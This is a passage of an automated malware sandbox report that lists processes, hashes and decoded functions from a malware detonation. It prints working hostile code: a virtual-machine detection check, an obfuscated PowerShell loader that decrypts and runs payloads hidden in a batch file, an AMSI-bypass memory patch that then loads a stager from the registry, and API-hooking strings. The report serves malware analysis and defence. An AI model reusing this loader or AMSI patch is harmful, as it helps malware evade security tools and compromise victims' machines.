Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:22:24
Start date:	26/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Manufacturer,Model
Imagebase:	0x7ff7fedd0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:22:24
Start date:	26/09/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Imagebase:	0x7ff666420000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:22:30
Start date:	26/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));
Imagebase:	0x7ff734a20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:22:30
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: schtasks.exePID: 1352, Parent PID: 8084

General

Target ID:	29
Start time:	07:22:38
Start date:	26/09/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F
Imagebase:	0x7ff7031e0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:22:38
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:22:42
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0xff0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:22:42
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	07:22:42
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0xff0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	07:22:43
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAWa.GetMethod(''+[Char](71)+'et'+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+[Char](65)+'ddre'+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+'bli'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MlhLFxQWSgAKoXShnVb=oxbNdIdJMSmp @([String])([IntPtr]);$VJNyACbUNbdCoehksOpZGU=oxbNdIdJMSmp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YJrcNCzTvEU=$KRrkXMMJHQAWa.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$IHAbcsfdEtkEyD=$doZKqFPbZxNLSh.Invoke($Null,@([Object]$YJrcNCzTvEU,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+'b'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$QNPqhRmAgVHBRCOcZ=$doZKqFPbZxNLSh.Invoke($Null,@([Object]$YJrcNCzTvEU,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+'t')));$NjQOgbk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IHAbcsfdEtkEyD,$MlhLFxQWSgAKoXShnVb).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+'d'+'l'+''+'l'+'');$tHbMpbZeVqMdjOqLT=$doZKqFPbZxNLSh.Invoke($Null,@([Object]$NjQOgbk,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+'a'+'n'+'B'+'uff'+[Char](101)+''+'r'+'')));$dMXDRTQmEn=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QNPqhRmAgVHBRCOcZ,$VJNyACbUNbdCoehksOpZGU).Invoke($tHbMpbZeVqMdjOqLT,[uint32]8,4,[ref]$dMXDRTQmEn);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tHbMpbZeVqMdjOqLT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QNPqhRmAgVHBRCOcZ,$VJNyACbUNbdCoehksOpZGU).Invoke($tHbMpbZeVqMdjOqLT,[uint32]8,0x20,[ref]$dMXDRTQmEn);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](99)+''+'n'+'t'+[Char](45)+'s'+[Char](116)+'a'+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	07:22:44
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	07:22:45
Start date:	26/09/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dllhost.exe /Processid:{613480bb-0e59-44d7-94a6-0c4ff8614e86}
Imagebase:	0x7ff7d8730000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	07:22:46
Start date:	26/09/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff6fc1b0000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	07:22:46
Start date:	26/09/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff6d9390000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	07:22:47
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	07:22:48
Start date:	26/09/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff74b010000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	07:22:48
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	07:22:48
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	07:22:49
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	07:22:50
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	07:22:50
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	07:22:51
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	07:22:51
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	07:22:52
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	07:22:53
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	07:22:54
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	07:22:55
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	07:22:55
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	07:22:56
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	07:22:56
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	56
Start time:	07:22:56
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	57
Start time:	07:22:58
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	627
Start time:	07:23:07
Start date:	26/09/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	643
Start time:	07:23:16
Start date:	26/09/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.6%
Total number of Nodes:	116
Total number of Limit Nodes:	7

Executed Functions

Function 000001F1197D1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001F1197D1E47
GetProcAddress.KERNEL32 ref: 000001F1197D1E57
SleepEx.KERNELBASE ref: 000001F1197D1E67

Strings

amsi.dll, xrefs: 000001F1197D1E40
AmsiScanBuffer, xrefs: 000001F1197D1E50

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 0fd0f5001b19b18dfbaafd6f630e943746e03fc45313e0a380a3b490d0de784a
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: E4D06735A19616F5EE0CAB35E8543F82263BF64F81FD40439C73B052A0EE3C895D8B50

Function 000001F1197D1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001F1197D1E7F

Part of subcall function 000001F1197D22A8: GetModuleHandleA.KERNEL32(?,?,?,000001F1197D1EB1), ref: 000001F1197D22C0
Part of subcall function 000001F1197D22A8: GetProcAddress.KERNEL32(?,?,?,000001F1197D1EB1), ref: 000001F1197D22D1

CreateThread.KERNELBASE ref: 000001F1197D2043
TlsAlloc.KERNEL32 ref: 000001F1197D2049
TlsAlloc.KERNEL32 ref: 000001F1197D2055
TlsAlloc.KERNEL32 ref: 000001F1197D2061
TlsAlloc.KERNEL32 ref: 000001F1197D206D
TlsAlloc.KERNEL32 ref: 000001F1197D2079
TlsAlloc.KERNEL32 ref: 000001F1197D2085

Strings

EnumServiceGroupW, xrefs: 000001F1197D1F50
pdh.dll, xrefs: 000001F1197D1FD7, 000001F1197D1FF8
advapi32.dll, xrefs: 000001F1197D1F57, 000001F1197D1F78
NtQuerySystemInformation, xrefs: 000001F1197D1EA5
EnumServicesStatusExW, xrefs: 000001F1197D1F71, 000001F1197D1F92
NtEnumerateValueKey, xrefs: 000001F1197D1F36
AmsiScanBuffer, xrefs: 000001F1197D2012
NtEnumerateKey, xrefs: 000001F1197D1F19
PdhGetFormattedCounterArrayW, xrefs: 000001F1197D1FF1
NtResumeThread, xrefs: 000001F1197D1EC2
ntdll.dll, xrefs: 000001F1197D1E8D
NtDeviceIoControlFile, xrefs: 000001F1197D1FB6
sechost.dll, xrefs: 000001F1197D1F99
amsi.dll, xrefs: 000001F1197D2019
NtQueryDirectoryFile, xrefs: 000001F1197D1EDF
PdhGetRawCounterArrayW, xrefs: 000001F1197D1FD0
NtQueryDirectoryFileEx, xrefs: 000001F1197D1EFC

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
